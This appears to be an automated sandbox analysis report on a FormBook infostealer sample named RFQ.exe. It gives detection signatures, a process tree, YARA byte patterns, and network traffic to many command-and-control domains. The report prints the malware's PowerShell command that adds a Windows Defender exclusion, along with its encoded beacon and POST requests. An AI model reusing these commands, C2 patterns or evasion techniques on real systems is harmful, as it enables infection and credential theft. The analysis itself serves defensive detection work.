Windows Analysis Report
RFQ.exe

Overview

General Information

Sample name:RFQ.exe
Analysis ID:1426618
MD5:4d82cc1b35b8dc9ec7d149f1b8b95e95
SHA1:a1d363742603070b3fc7d2db4fc431307618b1b8
SHA256:eedd6d6a9ec4bf82ca87e66c1ae5b86983e8479598df71f3602283b93dd07035
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • RFQ.exe (PID: 4464 cmdline: "C:\Users\user\Desktop\RFQ.exe" MD5: 4D82CC1B35B8DC9EC7D149F1B8B95E95)
    • powershell.exe (PID: 5776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5000 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • RFQ.exe (PID: 3580 cmdline: "C:\Users\user\Desktop\RFQ.exe" MD5: 4D82CC1B35B8DC9EC7D149F1B8B95E95)
      • KdNqCjDpwdLOuI.exe (PID: 5444 cmdline: "C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • icacls.exe (PID: 3140 cmdline: "C:\Windows\SysWOW64\icacls.exe" MD5: 2E49585E4E08565F52090B144062F97E)
          • KdNqCjDpwdLOuI.exe (PID: 2940 cmdline: "C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1308 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2d583:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x16b92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.2157544338.0000000001920000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.2157544338.0000000001920000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x29e50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1345f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000008.00000002.4432058562.0000000003690000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        SourceRuleDescriptionAuthorStrings
        5.2.RFQ.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          5.2.RFQ.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d583:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16b92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          5.2.RFQ.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            5.2.RFQ.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2c783:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x15d92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ.exe", ParentImage: C:\Users\user\Desktop\RFQ.exe, ParentProcessId: 4464, ParentProcessName: RFQ.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe", ProcessId: 5776, ProcessName: powershell.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ.exe", ParentImage: C:\Users\user\Desktop\RFQ.exe, ParentProcessId: 4464, ParentProcessName: RFQ.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe", ProcessId: 5776, ProcessName: powershell.exe
            No Snort rule has matched

            AV Detection

            Source: RFQ.exeVirustotal: Detection: 29%Perma Link
            Source: RFQ.exeReversingLabs: Detection: 18%
            Source: Yara matchFile source: 5.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2157544338.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4432058562.0000000003690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4432005342.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4433484681.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2158404724.0000000002750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4431863732.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: RFQ.exeJoe Sandbox ML: detected
            Source: RFQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: RFQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: icacls.pdb source: RFQ.exe, 00000005.00000002.2157289762.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 00000007.00000002.4431445445.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KdNqCjDpwdLOuI.exe, 00000007.00000002.4431314458.00000000008FE000.00000002.00000001.01000000.0000000D.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431191705.00000000008FE000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: RFQ.exe, 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, 00000008.00000003.2157292356.0000000003553000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000003.2159010272.0000000003709000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: icacls.pdbGCTL source: RFQ.exe, 00000005.00000002.2157289762.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 00000007.00000002.4431445445.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RFQ.exe, RFQ.exe, 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, icacls.exe, 00000008.00000003.2157292356.0000000003553000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000003.2159010272.0000000003709000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030DB130 FindFirstFileW,FindNextFileW,FindClose,8_2_030DB130
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 4x nop then xor eax, eax8_2_030C90E0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 4x nop then pop edi8_2_030D16E4
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 4x nop then pop edi8_2_030CD4A0

            Networking

            Source: DNS query: www.book-of-degen.xyz
            Source: DNS query: www.fusionndustries.xyz
            Source: Joe Sandbox ViewIP Address: 91.195.240.117 91.195.240.117
            Source: Joe Sandbox ViewIP Address: 66.96.162.136 66.96.162.136
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=4BEdEKurUNEFwkFRegiDBzC7pj7sTtT0kB0gdoDHo+aBzggPclQDQJqF4ehpSB3lBDvuZzIzoYk2h0Zy/GWQSTC2T/c7HqqgmNNGpbvCRxrYpdpNw0fXnMi51aRJIBirrQ== HTTP/1.1Host: www.elysiangame.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?gr=Z7N7hXY/vxItmyrXNQB4LENYEQnuSZ4/X1tSw0B7uFqoJtXe6IwXeXQiXEM/Xr4/ado0xvKOz5lKhVT9TZmVC0ntJKIXA1qlQqDuwiNLRNgNzKASDET1ivmJ23BpeRNTPw==&kFGTX=Q6OxIXo8tXD HTTP/1.1Host: www.blueberry-breeze.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=k/xiXeKkElN9lmj7tVr8idaf/wpGLS/XfVixYgRWGr55oYC/zYvRgJVTIR6Icyf7C+fnrNLi6yuD3OJtT3FnzryZpasAqgaz10+v5QpHvKqHjO9njldZ1cZrBWCORkcOsw== HTTP/1.1Host: www.collegeclubapparel.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?gr=J5sdn6UHwrTFsLl7PSE+273sNdFQMS+e/Eepb66AdUMKjr/OxnnLPWtAHrBNDsqMNKwlUYW9tPjJnamC/Yv4erSiZvDT3TM3BG/s9HlMNwb39HB/smoNNYSAbH35aGk1gA==&kFGTX=Q6OxIXo8tXD HTTP/1.1Host: www.vvbgsekbo.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=23UPPxRjGSNUJTgmtj2qEyLz/ntkvqKRRFHtLj5W9bo9CLdZgto2DYnNUhYakwcl0jYhNZjG9CPBZRuAkcQvlwifYrEIa7IdBg/GlOURZYl7vwvnI0pSC8vNdE3Ml+j1JA== HTTP/1.1Host: www.mytemplotech.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?gr=zdwoT+oWWlgyDxCB5HfbKl0ceeCoMM1WsfXRj0lrAfPT+1DsmzcZqVZ0gwFwp9Re8dyKn5b7kYDBw8FcuEN9m4nkKjfCAjjkfqKhmamnNO4NqnkVPKDFVPgTCNPXruJSGA==&kFGTX=Q6OxIXo8tXD HTTP/1.1Host: www.othlastore.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=90cL6Q+hnzVn1nW1iqhU1H7cWV3fvz6SaIERCijRkAMfp+TQya0GlzYPpQzULEJqUDrLh9Kv8LQV8OdLSWJ6ERPfs+zhKb8B6PZEz280PNZ5UlofhaQwyuwHrpNW2TXV5g== HTTP/1.1Host: www.book-of-degen.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?gr=xJEpvmsSZWMn08k0fswZUF3i8FJV6XmZDE9zwebvcwnWaSyOd7ieKTZxqd8LfY736VbykJAs8QtIZUIve9rpP7hx1kot6ym/I/JMbr2a3NM5FLBwcSvbdBi7Xsx3rbBzJg==&kFGTX=Q6OxIXo8tXD HTTP/1.1Host: www.fusionndustries.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=BPQNeXp4G99ixa42Ae2HhZRkmtmfIWoN8C4XxZZLRtTgWub9dK20l7PCUAY7izqtYkjPPbLJsAPTHyCf3Tn8bJnCF1PYC6i+wP1GhXiXOwtWSBMDP4vgP+g0mku5o7pd9Q== HTTP/1.1Host: www.66bm99.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?gr=1jaEnVPJQbBr8WwKNEfMHYGZjhye5aSOWdurwFccCTE0UU1/+EdJo2t+tokAsIL/Mwf8dbmtfOzyBKuFYSi0CvpWL7by1S5GZC5tkYq+xKghYmLhmWFfGXtgNdAY2BZgRg==&kFGTX=Q6OxIXo8tXD HTTP/1.1Host: www.wedgetechflash.co.keAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=N6yreUGrEwmnZyuRuhm7fu2pjjSQdKU6BgmK3dVc5hhl4QdzezeViDhR5sAjVdDUmsLMRcLdrvPdYjLD7b1ZIx3A1Z1l9931wLtzigwrLlFKueBnJaM0qh412Fe43461Qw== HTTP/1.1Host: www.ojyphyi.websiteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=dFo211Ya6GQqvQphJd5Z9kXpbZuBKAdHlLq9NOD/jOOiJZxFh2qZdwUu6l5GM/Gcb7yTWO1JQ6ZPaNdZMdh+co6vneivRci+mW27rS4RiRuWVEkpVXbIIudDxuuJlDWajg== HTTP/1.1Host: www.myspinpods.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?gr=6OoDw3xNyuUxCb7SO8/wQWyB7gJcoYv4ZTaI1h51IYF+sVRVSOMOuR9r6Rx19mFv7TRZYpTQN5hhg3dhUB7GRpmcej2viG1w8/6TMbbBsdyRJnmf1CwT9GI+x7zG1LG56Q==&kFGTX=Q6OxIXo8tXD HTTP/1.1Host: www.seatheskydesign.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=UMNiUc6XIv/d2uC7IlFmdfXYbiB/0cGyF5nVzLNzjfRVEsK0zJlkeP+z5Z1MT37PYueGSacB+keqYnFu3S8ymlT8yqaJ/dNBtni0ghgK1oHFbUR/jwcWs7rz0kpYku2gKQ== HTTP/1.1Host: www.naglissere.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: unknownDNS traffic detected: queries for: www.elysiangame.online
            Source: unknownHTTP traffic detected: POST /bnz5/ HTTP/1.1Host: www.blueberry-breeze.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cache-Control: max-age=0Connection: closeContent-Length: 203Content-Type: application/x-www-form-urlencodedOrigin: http://www.blueberry-breeze.comReferer: http://www.blueberry-breeze.com/bnz5/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 16 Apr 2024 09:59:23 GMTserver: LiteSpeedvary: User-Agent
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Apr 2024 10:00:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: *Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,TokenContent-Encoding: gzipData Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Apr 2024 10:00:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: *Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,TokenContent-Encoding: gzipData Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Apr 2024 10:00:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: *Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,TokenContent-Encoding: gzipData Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Apr 2024 10:00:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: *Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,TokenData Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlDate: Tue, 16 Apr 2024 10:00:51 GMTServer: NetlifyX-Nf-Request-Id: 01HVK5M9C7DRX0A3PMYF6BG4XBConnection: closeTransfer-Encoding: chunked
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Date: Tue, 16 Apr 2024 10:00:53 GMT | Server: Netlify | X-Nf-Request-Id: 01HVK5MBYG15N8ZTVMHJ1MWWT5 | Connection: close | Transfer-Encoding: chunked
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Date: Tue, 16 Apr 2024 10:00:56 GMT | Server: Netlify | X-Nf-Request-Id: 01HVK5MEGTM54BM3C6NFASF488 | Connection: close | Transfer-Encoding: chunked
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Date: Tue, 16 Apr 2024 10:00:59 GMT | Server: Netlify | X-Nf-Request-Id: 01HVK5MH2VHJ14N108E9M8MFJM | Connection: close | Transfer-Encoding: chunked
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 16 Apr 2024 10:01:04 GMT | Server: Apache | Content-Length: 11834 | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 16 Apr 2024 10:01:07 GMT | Server: Apache | Content-Length: 11834 | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 16 Apr 2024 10:01:10 GMT | Server: Apache | Content-Length: 11834 | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 16 Apr 2024 10:01:12 GMT | Server: Apache | Content-Length: 11834 | Connection: close | Content-Type: text/html; charset=utf-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 16 Apr 2024 10:01:34 GMT | Server: Apache | X-Powered-By: PHP/7.4.33 | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://wedgetechflash.co.ke/wp-json/>; rel="https://api.w.org/" | Referrer-Policy: no-referrer-when-downgrade | X-Endurance-Cache-Level: 0 | X-nginx-cache: WordPress | Connection: close | Transfer-Encoding: chunked | Content-Type: text/html; charset=UTF-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 16 Apr 2024 10:01:37 GMT | Server: Apache | X-Powered-By: PHP/7.4.33 | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://wedgetechflash.co.ke/wp-json/>; rel="https://api.w.org/" | Referrer-Policy: no-referrer-when-downgrade | X-Endurance-Cache-Level: 0 | X-nginx-cache: WordPress | Connection: close | Transfer-Encoding: chunked | Content-Type: text/html; charset=UTF-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 16 Apr 2024 10:01:40 GMT | Server: Apache | X-Powered-By: PHP/7.4.33 | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://wedgetechflash.co.ke/wp-json/>; rel="https://api.w.org/" | Referrer-Policy: no-referrer-when-downgrade | X-Endurance-Cache-Level: 0 | X-nginx-cache: WordPress | Connection: close | Transfer-Encoding: chunked | Content-Type: text/html; charset=UTF-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 16 Apr 2024 10:02:40 GMT | Content-Type: text/html | Content-Length: 867 | Connection: close | Server: Apache | Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT | Accept-Ranges: bytes | Age: 0
